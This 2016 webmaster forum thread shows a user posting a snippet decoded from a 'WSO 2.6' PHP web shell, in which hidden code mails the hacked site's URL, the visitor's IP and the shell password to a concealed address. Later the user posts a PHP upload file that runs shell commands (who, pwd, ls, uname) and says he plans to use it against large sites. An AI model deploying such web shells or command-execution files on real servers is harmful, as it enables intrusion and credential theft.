What is this php? - GoFuckYourself.com

deonbell · 05-06-2016, 10:06 PM

PHP Code:


			
$visitc = $_COOKIE["visits"];
if ($visitc == "") {
  $visitc  = 0;
  $visitor = $_SERVER["REMOTE_ADDR"];
  $web     = $_SERVER["HTTP_HOST"];
  $inj     = $_SERVER["REQUEST_URI"];
  $target  = rawurldecode($web.$inj);
  $judul   = "WSO 2.6 http://$target by $visitor";
  $body    = "Bug: $target by $visitor - $auth_pass";
  if (!empty($web)) { @mail("[email protected]",$judul,$body,$auth_pass); }
}

I find program, I want to use application called 404.php. But I looked at code. It said base64 encoded in code and this what is said. Does e-mail password and ip?

Here is all code.
"404 Not Found" By aLLiGaToR - Pastebin.com
Maybe I just delete base64 line in code. Everything okay? Or maybe better if I use pentest monkey's reverse shell.

I only use code for good. I want to be a white hacker.

Spunky · 05-06-2016, 10:11 PM

It will never work

deonbell · 05-06-2016, 10:30 PM

Quote:

Originally Posted by Spunky

It will never work

Yes, I try pentest monkey shell and it not work at all. I delete base64 code from 404.php shell. I hope no more backdoors. And it works on old server running old php 5.5, but not on server with php 7. Maybe 404 php code defecated in php 7.

Thank for your help Spunky.

Spunky · 05-06-2016, 10:48 PM

I try to help the peoples

clickity click · 05-07-2016, 03:17 AM

Quote:

Originally Posted by deonbell

PHP Code:


			
$visitc = $_COOKIE["visits"];

if ($visitc == "") {

  $visitc  = 0;

  $visitor = $_SERVER["REMOTE_ADDR"];

  $web     = $_SERVER["HTTP_HOST"];

  $inj     = $_SERVER["REQUEST_URI"];

  $target  = rawurldecode($web.$inj);

  $judul   = "WSO 2.6 http://$target by $visitor";

  $body    = "Bug: $target by $visitor - $auth_pass";

  if (!empty($web)) { @mail("[email protected]",$judul,$body,$auth_pass); }

}

I find program, I want to use application called 404.php. But I looked at code. It said base64 encoded in code and this what is said. Does e-mail password and ip?

Here is all code.
"404 Not Found" By aLLiGaToR - Pastebin.com
Maybe I just delete base64 line in code. Everything okay? Or maybe better if I use pentest monkey's reverse shell.

I only use code for good. I want to be a white hacker.

What do you want to do with the shell?

HomerSimpson · 05-07-2016, 03:22 AM

When I try to open that pastebin my NOD32 says:

clickity click · 05-07-2016, 04:19 AM

Quote:

Originally Posted by HomerSimpson

When I try to open that pastebin my NOD32 says:

Well duh. It's a web shell.

CPA-Rush · 05-07-2016, 06:23 AM

https://github.com/rogierkn/PrettyBoot

Barry-xlovecam · 05-07-2016, 06:49 AM

Happy Hacking
k0d3k1dd13

deonbell · 05-07-2016, 11:53 AM

I think I don't need nice shell for proof of conception. I create a php file that shows I upload. I want to upload this to facebook or google and get money for finding bug. I will make similar files for asp and js. Then I get a money to buy new roller blades.

PHP Code:


			
<?php



echo "<h1>proof</h1>";

echo "<h1>who?</h1>";

system("who");

echo "<h2>Current Directory</h2>";

system("pwd");

echo "<h2>Files</h2>";

system("ls");

echo "<h2>Uname</h2>";

system("uname -a");





?>

Colmike9 · 05-07-2016, 11:58 AM

People doing code bounties don't have to ask questions like this..

05-06-2016, 10:06 PM	#1
deonbell Confirmed User Industry Role: Join Date: Sep 2015 Posts: 1,045	What is this php? PHP Code: `$visitc = $_COOKIE["visits"]; if ($visitc == "") { $visitc = 0; $visitor = $_SERVER["REMOTE_ADDR"]; $web = $_SERVER["HTTP_HOST"]; $inj = $_SERVER["REQUEST_URI"]; $target = rawurldecode($web.$inj); $judul = "WSO 2.6 http://$target by $visitor"; $body = "Bug: $target by $visitor - $auth_pass"; if (!empty($web)) { @mail("[email protected]",$judul,$body,$auth_pass); } }` I find program, I want to use application called 404.php. But I looked at code. It said base64 encoded in code and this what is said. Does e-mail password and ip? Here is all code. "404 Not Found" By aLLiGaToR - Pastebin.com Maybe I just delete base64 line in code. Everything okay? Or maybe better if I use pentest monkey's reverse shell. I only use code for good. I want to be a white hacker. __________________ Fake Naked Celebrity Sex Gallery

05-06-2016, 10:11 PM	#2
Spunky I need a beer Industry Role: Join Date: Jun 2002 Location: ♠ Toiletville ♠ Posts: 133,949	It will never work __________________ *YOUR INFORMATION HERE*

05-06-2016, 10:48 PM	#4
Spunky I need a beer Industry Role: Join Date: Jun 2002 Location: ♠ Toiletville ♠ Posts: 133,949	I try to help the peoples __________________ *YOUR INFORMATION HERE*

05-07-2016, 03:22 AM	#6
HomerSimpson Too lazy to set a custom title Industry Role: Join Date: Sep 2005 Location: Springfield Posts: 13,826	When I try to open that pastebin my NOD32 says: __________________ Make a bank with Chaturbate - the best selling webcam program Ads that can't be block with AdBlockers !!! /// Best paying popup program (Bitcoin payouts) !!! PHP, MySql, Smarty, CodeIgniter, Laravel, WordPress, NATS... fixing stuff, server migrations & optimizations... My ICQ: 27429884 \| Email:

05-07-2016, 06:23 AM	#8
CPA-Rush small trip to underworld Industry Role: Join Date: Mar 2012 Location: first gen intel 80386/nintendo-gb/arcade/ps1/internet person Posts: 4,927	https://github.com/rogierkn/PrettyBoot __________________ automatic exchange - paxum , bitcoin,pm, payza . daizzzy signbucks caution will black-hat black-hat your traffic ignored forever :zuzana designs {firefox- remove some posters \|skills#1\|skills#2\| email >[email protected] } ツ

05-07-2016, 06:49 AM	#9
Barry-xlovecam It's 42 Industry Role: Join Date: Jun 2010 Location: Global Posts: 18,083	Happy Hacking k0d3k1dd13

05-07-2016, 11:53 AM	#10
deonbell Confirmed User Industry Role: Join Date: Sep 2015 Posts: 1,045	I think I don't need nice shell for proof of conception. I create a php file that shows I upload. I want to upload this to facebook or google and get money for finding bug. I will make similar files for asp and js. Then I get a money to buy new roller blades. PHP Code: `<?php echo "<h1>proof</h1>"; echo "<h1>who?</h1>"; system("who"); echo "<h2>Current Directory</h2>"; system("pwd"); echo "<h2>Files</h2>"; system("ls"); echo "<h2>Uname</h2>"; system("uname -a"); ?>` __________________ Fake Naked Celebrity Sex Gallery

05-07-2016, 11:58 AM	#11
Colmike9 (>^_^)b Industry Role: Join Date: Dec 2011 Posts: 7,224	People doing code bounties don't have to ask questions like this.. __________________ Join the BEST cam affiliate program on the internet! I've referred over $1.7mil in spending this past year, you should join in. I make a lot more money in the medical field in a lab now, fuck you guys. Don't ask me to come back, but do join Chaturbate in my sig, it still makes bank without me touching shit for years..